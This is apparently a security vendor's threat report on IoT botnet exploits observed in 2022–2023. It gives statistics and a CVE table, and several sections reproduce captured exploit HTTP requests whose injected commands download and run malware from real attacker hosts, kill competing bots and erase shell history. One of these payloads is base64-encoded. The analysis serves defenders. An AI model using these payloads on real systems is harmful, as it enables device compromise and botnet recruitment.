The 2022-2023 IoT Botnet Report – Vulnerabilities Targeted

All posts
Posted on 37 min read

This report investigates the IoT botnet activity we’ve observed in consumer networks protected by CUJO AI from early July 2022 to the end of January 2023. For more insights into our research, visit the CUJO AI blog and the ISP security hub. Click here to skip the introduction and jump to the report. You can download the full report in a single PDF file here. Introduction Most Internet of Things (IoT) devices have limited resources, Unix-like operating systems and inadequate cybersecurity measures. The latter, combined with the often short and neglected software support cycles from device manufacturers, provide a significant breeding ground for cybercriminals, who are keen to take advantage of the situation. Table of contents

IoT Threats

Our latest annual cybersecurity report shows that while IP cameras make up only 1.2% of all devices monitored and protected by CUJO AI, they are targeted by 24% of all malicious activities. The following popular manufacturers’ devices are targeted by the most threats on average:

  • Seagate (NAS products)
  • Speco Technologies (CCTV, DVR products)
  • QNAP (NAS products)
  • Hikvision (IP Camera, DVR products)

The Internet of Things (IoT)

What Are We Calling a Botnet?

Since we’ll be discussing botnet-related threats, we should start with a definition of what a botnet is. A botnet is a network of devices infected by specific malware, where devices can be controlled by the operator of the malware. This specific type of malware is also referred to as a “botnet”, which is the meaning we will be using here from now on.

How Botnets Work

The anatomy of a typical botnet-related attack on IoT devices hasn’t changed much in the past couple of years, and we have detailed it in a previous article. In short, it involves a stager shell script, which downloads and starts executing the malware binaries. The binary names generally include the CPU architecture they are compiled for. Most of the malware observed in the IoT landscape are variants of the infamous Mirai or Gafgyt botnets, but malware written in Go is on the rise too, with Sysrv and Zerobot as prime examples of this. Two of the main vectors for the spread of botnets are:

  1. Brute-forcing weak login credentials
  2. Exploiting known software vulnerabilities

In general, the first one is the more common method, as noted in our previous report: “poor quality IoT devices often come with hard-coded, default passwords that are not changed by the user or, when a password change is enforced, changed to an easy to remember (and therefore quickly brute-forceable) password”. The problem remains prevalent today.

Previous Botnet Report

Our previous report covered a 4-month period in 2021 and found that only 8% of the samples contained exploits. Of those, 83% used two or more vulnerability exploits. In total, we had found 20 different vulnerabilities being targeted, with most them disclosed in 2018 or earlier.

The 2022-2023 IoT Botnet Report: A Short Summary

Between early July 2022 and the end of January 2023, 6,471 different ELF binaries were classified as malicious and 1,685, or 26%, contained at least 1 exploit of a vulnerability, which is a major increase from 8% in 2021. In total, 55 vulnerabilities are being exploited, more than twice as many as in 2021. By looking at the Common Weakness Enumerations (CWEs), a community-developed list of hardware and software vulnerability types assigned to the vulnerabilities, we’ve observed some variation from the 100% “Injection” type vulnerabilities we’d seen earlier. However, even when the CWE category is technically different, the goal of the malware is almost always the same: to remotely run commands on the targeted system. The one real outlier is CVE-2021-4034, which enables local privilege escalation. There are three new entries in the top 10 list of exploited vulnerabilities. However, CVE-2017-17215 is by far the most frequently seen exploit in malware: it is used by 1,625 out of 1,685 exploit-containing binaries. Of the more frequently seen newly exploited vulnerabilities, all are tied to the Zerobot botnet, but two are also exploited by other malware. The distribution of vulnerabilities by their year of disclosure shows some major shifts compared to our last report, as more recent (disclosed within two years prior to this report) vulnerabilities are represented in much greater numbers, although few malware binaries exploit them. Fewer malware binaries use two or more exploits – 40% in 2022-23 versus 83% in 2021. In total, 36 different exploit sets are observed and Zerobot equips the largest exploit set with 22 entries. Only 6 out of 36 exploit sets discovered during our research include exploits for recently disclosed (within two years prior to this report) vulnerabilities. Four of these sets are made up of around 50% or more exploits targeting recent vulnerabilities. We have explicitly named and listed these four sets along with their malware, since they are the most innovate in terms of exploiting fresh vulnerabilities. You can download the full report in a single PDF file here.

List of Exploited Vulnerabilities

This is a list of all the exploited vulnerabilities we’ve detected between early July 2022 and the end of January 2023. The Vulnerability Type column is based on the Common Weakness Enumeration (CWE). We are also listing the affected device or software types with specific models or version names.

CVE Vulnerability name Vulnerability type (CWE) Affected device/software type
CVE-2007-3010 Alcatel OmniPCX Unified Maintenance Tool “masterCGI” Unauthenticated Remote Command Execution via ‘user’ parameter Improper Input Validation Software (Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server)
Netgear “setup.cgi” Unauthenticated Remote Command Execution Command Injection Router (Netgear DGN1000, DGN2000)
ZTE ZXV10 H108L “manager_dev_ping_t.gch” Remote Command Execution Command Injection Router (ZTE ZXV10 H108L)
CVE-2013-7471 D-Link UPnP “soap.cgi” Unauthenticated Remote Command Execution Command Injection Router (D-Link DIR-300, DIR-600, DIR-645, DIR-845, DIR-865)
Linksys “tmUnblock.cgi” Unauthenticated Remote Command Execution Command Injection Router (Linksys E-series)
CVE-2014-2321 ZTE Cable Modem “web_shell_cmd.gch” Unauthenticated Remote Command Execution Command Injection[1] Modem (ZTE F460, F660)
CVE-2014-3206 Seagate BlackArmor NAS “localJob.php” Unauthenticated Remote Command Execution Improper Input Validation NAS (Seagate BlackArmor NAS 110, 220)
CVE-2014-8361 Realtek SDK – miniigd UPnP SOAP “wanipcn.xml”/”picsdesc.xml” Unauthenticated Command Execution Improper Input Validation Software (Realtek SDK), Router (multiple products in D-Link DIR-series)
CVE-2014-9118 DASAN Zhone “zhnping.cmd” Authenticated Remote Command Execution via ‘ipAddr’ parameter Command Injection Router (DASAN Zhone zNID GPON 2426A)
CVE-2015-2051 Unauthenticated Remote Command Execution via the “GetDeviceSettings” action to the HNAP interface Command Injection Router (D-Link DIR-645)
AVTECH Remote Command Execution via “Search.cgi” (unauthenticated), “CloudSetup.cgi” (authenticated) or “adcommand.cgi” (authenticated) pages Command Injection IP camera, NVR, DVR (AVTECH)
VACRON NVR “board.cgi” Remote Command Execution via ‘cmd’ parameter Command Injection NVR (VACRON)
CCTV/DVR “language/Swedish” Remote Command Execution Command Injection DVR, CCTV (more than 70 vendors)
CVE-2016-6277 Netgear “cgi-bin/;” Unauthenticated Remote Command Execution Command Injection[2] Router (multiple products in Netgear R-series and D-series)
CVE-2016-10372 ZyXEL/eir D1000 “UD/act?” Unauthenticated Remote Command Execution Command Injection Modem (ZyXEL/eir D1000)
CVE-2016-20016 JAWS webserver “/shell” Unauthenticated Remote Command Execution Command Injection DVR (MVPower TV-7104HE, TV-7108HE.)
CVE-2016-20017 D-Link “login.cgi” Unauthenticated Remote Command Execution via ‘cli’ parameter Command Injection Router (D-Link DSL-2750B)
CVE-2017-5638 Apache Struts2 Unauthenticated Remote Command Execution via OGNL Injection Improper Input Validation Software (Apache Struts2)
CVE-2017-17215 Huawei HG532 “DeviceUpgrade_1” Authenticated Remote Command Execution Improper Input Validation Router (Huawei HG532)
CVE-2017-18368 ZyXEL “ViewLog.asp” router Unauthenticated Remote Command Execution via ‘remote_host’ parameter Command Injection Router (ZyXEL P660HN)
CVE-2017-18377 WIFICAM IP camera “set_ftp.cgi” Unauthenticated Remote Command Execution Command Injection IP camera (WIFICAM)
CVE-2018-10561/10562 Dasan GPON Routers “GponForm/diag_Form” Authentication Bypass and Command Injection vulnerabilities via ‘dest_host’ parameter Improper Authentication and Command Injection Router (Dasan GPON)
CVE-2018-10823 D-Link “chkisg.htm” Authenticated Remote Command Execution via ‘Sip’ parameter Command Injection Router (multiple D-Link DWR-series)
CVE-2018-17173 LG SuperSign CMS “getThumbnail” Unauthenticated Remote Command Execution via ‘sourceUri’ parameter Command Injection Software (LG SuperSign)
CVE-2018-20057 D-Link “formSysCmd” Authenticated Remote Command Execution via ‘sysCmd’ parameter Command Injection Router (D-Link DIR-619L, DIR-605L, Sapido RB-1732)
CVE-2018-20062 NoneCMS v1.3 ThinkPHP “index.php” Unauthenticated Remote Command Execution via ‘invokefunction’ parameter Improper Input Validation Software (NoneCMS v1.3, ThinkPHP)
CVE-2020-7209 LinuxKI Unauthenticated Remote Command Execution Command Injection Software (LinuxKI)
CVE-2020-8515 DrayTek Vigor2960 “mainfunction.cgi” Unauthenticated Remote Command Execution via ‘keyPath’ parameter Command Injection Firewall (DrayTek Vigor2960)
CVE-2020-8958 OptiLink GPON “formPing”/”formTracert” Authenticated Remote Command Execution via ‘target_addr’ parameter Command Injection Router (Guangzhou 1GE ONU V2801RW, V2804WR and OptiLink ONT1GEW)
CVE-2020-9054 ZyXEL NAS-series “weblogin.cgi” Unauthenticated Remote Command Execution via ‘username’ parameter Command Injection NAS (multiple products in ZyXEL NAS-series)
CVE-2020-10173 Multiple Authenticated Command Injection vulnerabilities in Comtrend VR-3033 routers via “ping.cgi” page and ‘pingIpAddress’ parameter Command Injection Router (Comtrend VR-3033)
CVE-2020-10987 Tenda “setUsbUnload” Unauthenticated Remote Command Execution via ‘deviceName’ parameter Command Injection Router (Tenda AC15, AC1900)
CVE-2020-17456 Seowon “system_log.cgi” Unauthenticated Remote Command Execution via ‘ipAddr’ parameter Command Injection Router (Seowon Intech SLC-130, SLR-120S)
CVE-2020-25506 D-Link “system_mgr.cgi” Unauthenticated Remote Command Execution Command Injection Router (D-Link DNS-320)
PHP 8.1.0-dev Backdoor Remote Command Execution Command Injection Software (PHP 8.1.0-dev)
CVE-2021-4034 Local privilege escalation vulnerability in polkit’s pkexec utility Out-of-bounds Read/Write Software (polkit pkexec utility)
CVE-2021-4039 ZyXEL “login.html” Unauthenticated Remote Command Execution via ‘myname’ parameter Command Injection Router (ZyXEL NWA-1100-NH)
CVE-2021-35394 Realtek Jungle SDK “orf;” Unauthenticated Remote Command Execution Command Injection and Out-of-bounds Write Software (Realtek Jungle SDK)
CVE-2021-35395 Realtek Jungle SDK Unauthenticated Command Injection vulnerabilities in “formSysCmd” and “formWsc” pages Command Injection and Out-of-bounds Write Software (Realtek Jungle SDK)
CVE-2021-36260 Hikvision webserver “SDK/webLanguage” Unauthenticated Remote Command Execution Command Injection IP camera (multiple products in Hikvision DS-2CD series)
CVE-2021-41773 Apache webserver Unauthenticated Path Traversal Path Traversal Software (Apache HTTP server)
CVE-2021-42013 Apache webserver Unauthenticated Path Traversal No.2 after an incomplete fix for CVE-2021-41773 Path Traversal Software (Apache HTTP server)
CVE-2021-44228 Apache Log4j Unauthenticated Command Execution Expression Language Injection Software (Apache Log4j)
CVE-2021-46422 Telesquare “admin.cgi” Unauthenticated Remote Command Execution via ‘Cmd’ parameter Command Injection Router (Telesquare SDT-CW3B1)
Adobe ColdFusion 11 Unauthenticated JNDI attack via ‘verifyldapserver’ method Deserialization of Untrusted Data Software (Adobe ColdFusion)
CVE-2022-1388 F5 BIG-IP Authentication Bypass in “mgmt/tm/util/bash” page via ‘run’ command and ‘utilCmdArgs’ parameter Missing Authentication for Critical Function Firewall (F5 BIG-IP)
CVE-2022-22947 Spring Cloud Gateway Unauthenticated Command Injection Command Injection Software (Spring Cloud Gateway)
CVE-2022-22965 “Spring4Shell” Unauthenticated Command Injection Command Injection Software (Spring MVC/Spring WebFlux)
CVE-2022-25075 TOTOLINK “downloadFlile.cgi” Unauthenticated Remote Command Execution via ‘payload’ parameter Command Injection Router (TOTOLINK A3000RU)
CVE-2022-26186 TOTOLINK “cstecgi.cgi” Unauthenticated Remote Command Execution via ‘exportOvpn’ interface and ‘command’ parameter Command Injection Router (TOTOLINK N600R)
CVE-2022-26210 TOTOLINK “cstecgi.cgi” Unauthenticated Remote Command Execution via ‘setUpgradeFW’ function and ‘FileName’ parameter Command Injection Router (multiple products in TOTOLINK A-series)
CVE-2022-29013 Razer Sila Unauthenticated Remote Command Execution in “ubus” page by ‘call’ method and ‘command’ parameter Command Injection Router (Razer Sila)
CVE-2022-30525 ZyXEL firewall Unauthenticated Remote Command Execution via “setWanPortSt” command and ‘mtu’ parameter Command Injection Firewall (multiple products in ZyXEL USG FLEX-series)
CVE-2022-34538 Digital Watchdog “addacph.cgi” Authenticated Remote Command Execution via multiple parameters Command Injection IP camera (Digital Watchdog DW MEGApix)
CVE-2022-37061 FLIR “res.php” Unauthenticated Remote Command Execution via “alarm” action and ‘id’ parameter Command Injection Thermal sensor camera (FLIR AX8)

Vulnerability Type Distribution by CWE

Here’s how the vulnerability types are distributed based on the CWE list: vulnerability type CWE distribution chart for the 2022-2023 botnet report, showing 42 vulnerabilities for command injection, 6 for improper input validation, 3 for out-of-bounds write, 2 for path traversal, and 1 each for missing authentication for critical function, out-of-bounds read, improper authentication, deserialization of untrusted data, and expression language injection

It’s All About Command Injection

Most of the vulnerabilities map on to the Injection category in the OWASP’s Top 10 Web Application Security Risks list, where ‘Injection’ includes Command Injection, Improper Input Validation and Expression Language Injection. This is not surprising, since the case was similar in our last report. Exploiting this type of vulnerability is most often quite simple, as it requires only one or a few specially crafted and parameterized HTTP requests that already contain the commands to be executed on the targeted system. These commands – the ‘exploit code’ – often download and execute a stager script or the malicious binaries themselves. Another factor that contributes to the low attack complexity for most of the vulnerabilities we observed is that even an unauthenticated user can execute a fully working exploit. There are nine vulnerabilities that have CWEs outside of the Injection category, like Out-of-bounds Read/Write or Path Traversal. These are described in more detail below, however, whatever their CWEs are technically, the threat actor can achieve command injection by exploiting eight of them.  CVE-2018-10561 and 10562 are always exploited together. The first one has the Improper Authentication CWE, which states that one can bypass authentication by appending “?images” to any URL that requires authentication on certain Dasan GPON routers. CVE-2018-10562 says that the diag_Form page with the dest_host form parameter can run arbitrary commands on the system. Thus, the following exploit is born. Exploit for CVE-2018-10561/10562 taken from [2]

POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World Content-Length: 118 XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=“;busybox+wget+http://194.87.71.134/ohshit.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0

CVE-2021-4034 is the one real outlier because it enables local privilege escalation, i.e., it allows the attacker to run commands as root on an already infected system, and is also a memory corruption vulnerability in its nature. The vulnerable software is polkit’s pkexec utility, which can be found on every major Linux distribution by default. It involves the reintroduction of ‘unsecure’ environment variables to pkexec’s environment, such as “GCONV_PATH”. These variables enable the attacker to run arbitrary commands as root, which are first compiled into a shared library file. The following screenshots show the use of GCONV_PATH and main.write_gconv_module(), which is responsible for the shared library file. You can find more detail about the vulnerability here. Indicators for a CVE-2021-4034 exploit taken from [9] CVE-2021-35394 and 35395 describe vulnerabilities in the Realtek Jungle SDK, which is a package of binaries supplied with specific Realtek SoCs (systems-on-chip) used by multiple router manufacturers. The exploit for CVE-2021-35394 is a little different from other exploits targeting Command Injection vulnerabilities, since it does not use an HTTP request, but rather a specifically formed UDP packet sent to a router’s port 9034 on a LAN IP address. Exploit for CVE-2021-35394 taken from [14]

orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel

CVE-2021-35395, on the other hand, uses a normal HTTP request sent to /goform/formWsc, where the form data’s peerPin parameter contains the exploit commands. This vulnerability can also be exploited with another page, called “formSysCmd” and its form data parameter sysCmd. The ‘goform’ part corresponds to the Go-Ahead webserver, used as a base for the router management web interface. There also are Boa webserver-based implementations, which would translate to ‘boafrm’ in the page path. Exploit for CVE-2021-35395 taken from [5]

POST /goform/formWsc User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Connection: close submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

At least two other CVEs (CVE-2018-20057 and CVE-2019-19824) can be traced back to CVE-2021-35395 since they describe product-specific vulnerabilities for the same web pages and form parameters, although the core problem lies in the Realtek Jungle SDK, which is used in the products with these vulnerabilities. This issue is described in detail in Onekey’s blogpost. CVE-2021-41773 and CVE-2021-42013 belong to the Path Traversal CWE. Both impact the Apache HTTP web server, and CVE-2021-42013 exists because the fix for CVE-2021-41773 was incomplete. The example exploits from the Zerobot malware ([5]) act in the same way: start bash and execute the commands in the form data section, where the part marked in red is essential and is base64 encoded in the actual requests. It should be noted that in the Zerobot binary the relevant Go method that implements these exploits is called CVE-2018-12613, which is a completely different vulnerability not exploited by Zerobot. Exploits for CVE-2021-41773 and CVE-2021-42013 taken from [5]

wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh

For CVE-2021-41773

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash

For CVE-2021-42013

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close

echo; echo d2dldCBodHRwOi8vemVyby5zdWRvbGl0ZS5tbC96ZXJvLnNoIHx8IGN1cmwgLW8gaHR0cDovL3 plcm8uc3Vkb2xpdGUubWwvemVyby5zaCB8fCBjdXJsIC1PIGh0dHA6Ly96ZXJvLnN1ZG9saXRlLm1sL3plcm8 uc2g7IGtpbGxhbGwgaSAuaSBtb3ppLm0gTW96aS5tIG1vemkuYSBNb3ppLmEga2FpdGVuIE5icnV0ZSBtaW5l cmQgL2Jpbi9idXN5Ym94OyBoaXN0b3J5IC1jOyBybSB+Ly5iYXNoX2hpc3Rvcnk7IGNobW9kIDc1NSB6ZXJv LnNoOyAvYmluL2Jhc2ggemVyby5zaA== | base64 -d | bash

The Adobe ColdFusion 11 JNDI attack via the ‘verifyldapserver’ method vulnerability has the Deserialization of Untrusted Data CWE, and the exploit connects to a rogue LDAP server (set up by the threat actor) via JNDI, whose address replaces the first ‘%s’ in the red-marked section of the HTTP request. The exploit code is then downloaded from the server and executed on the targeted system. Exploit for the Adobe ColdFusion 11 JNDI attack via ‘verifyldapserver’ method vulnerability taken from [7]

GET /CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=%s&vport=1389&vstart=&vusername=&vpassword=&returnformat=json HTTP/1.1 Host: %s %s: %s Accept: */* Content-Length: 4 Content-Type: application/x-www-form-urlencoded

CVE-2022-1388 has the Missing Authentication for Critical Function CWE because a threat actor can access the /mgmt/tm/util/bash page without authentication in certain F5 BIG-IP systems and run arbitrary commands as root from that page. The following exploit code is also taken from Zerobot and includes a pop culture reference in the value of the X-F5-Auth-Token. Exploit for CVE-2022-1388 taken from [5]

POST /mgmt/tm/util/bash User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/json Connection: keep-alive, X-F5-Auth-Token Authorization: Basic YWRtaW46 X-F5-Auth-Token: NeverGonnaGiveYouUpNeverGonnaLetYouDownNeverGonnaRunAroundAndDesertYou

And the JSON encoded data of:

“command”=”run” “utilCmdArgs”=”-c ‘wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh’

Specific Vulnerabilities Targeted

In the following chart, you can see how many malware binaries exploit a specific vulnerability.

Top 10 Vulnerabilities Exploited in 2021 vs 2022/2023

2021 2022-2023
  Vulnerability Count   Vulnerability Count
1 CVE-2017-17215 155 1 CVE-2017-17215 1625
2 CVE-2014-8361 90 2 CVE-2016-20016 418
3 CVE-2016-20016 48 3 CVE-2018-10561/10562 303
4 CVE-2018-10561/10562 44 4 CVE-2014-8361 283
5 CVE-2018-20062 41 5 CVE-2017-18368 176
6 CVE-2017-18368 36 6 CVE-2018-20062 160
7 CVE-2021-20090 36 7 CVE-2016-10372 149
8 CVE-2021-35395 36 8 Linksys ‘tmUnblock.cgi’ RCE 126
9 CVE-2014-3206 36 9 CVE-2015-2051 80
10 Linksys ‘tmUnblock.cgi’ RCE 29 10 Netgear ‘setup.cgi’ RCE 74

 

Just like in 2021, the most exploited vulnerability is CVE-2017-17215, which has the Improper Input Validation CWE and affects Huawei HG532 routers. The exploit enables an authenticated attacker to run arbitrary commands on the target system.

Exploit for CVE-2017-17215 taken from [1]

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: */* Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

<?xml version="1.0" ?><s:Envelope xmlns_s="http://schemas.xmlsoap.org/soap/envelope/" s_encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns_u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g astrxscan.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org -l /tmp/binary -r /1x57G5FGH4/0xC4TN3T-590.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

What is most important: out of 1,685 malicious binaries that contained at least one exploit, 96% (1,625) exploited this vulnerability! Since the vulnerability is quite old and only affects one type of router, there are relatively few devices in use today that would be affected by this vulnerability, at least not enough to justify such widespread use of the exploit. A reason for this magnitude of exploitation might be the extensive code-borrowing from other malware strains, which could be traced back to Mirai and Gafgyt, especially the former, since its original source code is publicly available. Code-borrowing in malware is sometimes irrational, and this exploit likely survived in the code unnoticed. The vulnerability also requires an authenticated user, making it more complex than the many unauthenticated remote command execution-type vulnerabilities that we observed. The rest of the Top 10 vulnerabilities more or less belong to the Injection-type, their exploitation is simple, all are quite old, with the most recent one disclosed in 2018. Top 2-6 exploits were also in the Top 10 in our 2021 botnet report, with some minor place-switching this year. The Linksys ‘tmUnblock.cgi’ RCE vulnerability climbed up a few places, and three CVEs were switched out entirely. For the three exploits that dropped out of the top 10: CVE-2021-20090 was not observed this year, CVE-2021-35395 was found in 28 binaries, and was discussed in detail, while CVE-2014-3206 appeared 9 times. The new additions to the Top 10 list are CVE-2016-10372, CVE-2015-2051 and Netgear ‘setup.cgi’ RCE, all of which have the Command Injection CWE. CVE-2016-10372 involves ZyXEL/eir D1000 modems, which have the TCP port 7547 exposed to the Internet, with a TR-064 server behind, originally intended as a means for the ISP to remotely configure software installation on the modem. This server accepts several legitimate commands, from where ‘SetNTPServers’ can be exploited to force the target system to run arbitrary commands. You can learn more here. The following exploit is incorrect in two places, highlighted in cyan. It uses the incorrect TCP port and introduces some additional characters inside the SOAP Envelope. Exploit for CVE-2016-10372 taken from [2]

POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7574 User-Agent: Hello, world SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 640

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns_u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://194.87.71.134/log19/log19.mips && chmod 777 log19.mips && ./log19.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

CVE-2015-2051 affects various D-Link routers that are vulnerable in their HNAP SOAP interface, via the “GetDeviceSettings” SOAPAction. The example exploit code shown below and the exploit code on the Internet do not match, as the relevant SOAPAction isn’t mentioned properly – SOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/<cmd>. We could not validate whether the exploit code in the malware is working properly. Exploit for CVE-2015-2051 taken from [2]

POST /HNAP1/ HTTP/1.0 Host: %s:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://194.87.71.134/log19/log19.mips && chmod 777 /tmp/log19.mips && /tmp/log19.mips hnap` Content-Length: 640

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns_xsd="http://www.w3.org/2001/XMLSchema" xmlns_soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping ><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

The Netgear ‘setup.cgi’ is among the oldest vulnerabilities with a 2013 disclosure year. It affects two Netgear routers, DGN1000 and DGN2000. The ‘syscmd’ function in setup.cgi is exploitable to run arbitrary commands unauthenticated. Exploit for Netgear “setup.cgi” RCE vulnerability taken from [2]

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://194.87.71.134/ohshit.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

New Exploited Vulnerabilities

These are the most exploited vulnerabilities that were not seen in the 2021 report.

CVE/Name Count Affected device/software types
CVE-2022-25075 41 Router (TOTOLINK A3000RU)
CVE-2022-30525 37 Firewall (ZyXEL USG FLEX-series)
PHP 8.1.0-dev Backdoor RCE 28 Software (PHP 8.1.0-dev)
CVE-2021-41773 28 Software (Apache HTTP server)
CVE-2021-42013 28 Software (Apache HTTP server)
CVE-2022-22965 28 Software (Spring MVC/Spring WebFlux)
CVE-2021-36260 28 IP camera (Hikvision)
CVE-2021-46422 28 Router (Telesquare SDT-CW3B1)
CVE-2022-26186 28 Router (TOTOLINK N600R)
CVE-2022-26210 28 Router (TOTOLINK A830R)
CVE-2022-34538 28 IP camera (Digital Watchdog DW MEGApix)
CVE-2022-37061 28 Thermal sensor camera (FLIR AX8)
CVE-2022-1388 28 Firewall (F5 BIG-IP)

All these vulnerabilities have something in common: they can all be found in Zerobot, and, in the timeframe of this research, all of them except for the first two were seen only in Zerobot. We’ve already described CVE-2021-41773, CVE-2021-42013 and CVE-2022-1388. The others have the Command Injection CWE. CVE-2022-25075 affects the TOTOLINK A3000RU router and the vulnerability was disclosed on the 12th of February 2022. The device contains a command injection vulnerability in the “Main” function of ‘downloadFlile.cgi’, which allows an attacker to execute arbitrary commands by controlling the ‘QUERY_STRING’ environment variable, which can be done with the ‘payload’ parameter. Exploit for CVE-2022-25075 taken from [5]

GET /cgi-bin/downloadFlile.cgi?payload=`wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh` User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 Connection: keep-alive Cache-Control: max-age=0

CVE-2022-30525 affects ZyXEL USG FLEX-series firewalls that also support Zero Touch Provisioning (ZTP). When using the ‘setWanPortSt’ configuration command on the ‘ztp/cgi-bin/handler’ page, the data supplied in the ‘data’ or ‘mtu’ parameter is passed unsanitized to the os.system method. You can learn more about this vulnerability here. The example exploit shown below is missing one ‘;’ character at the start and end of the command supplied to ‘mtu’, unlike other exploits found on the Internet. Exploit for CVE-2022-30525 taken from [5]

POST /ztp/cgi-bin/handler User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/json Connection: close

And the JSON encoded data of:

"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "data": "dota?", "mtu": "wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh"

Vulnerability Distribution by Disclosure Year: New vs Old Exploits

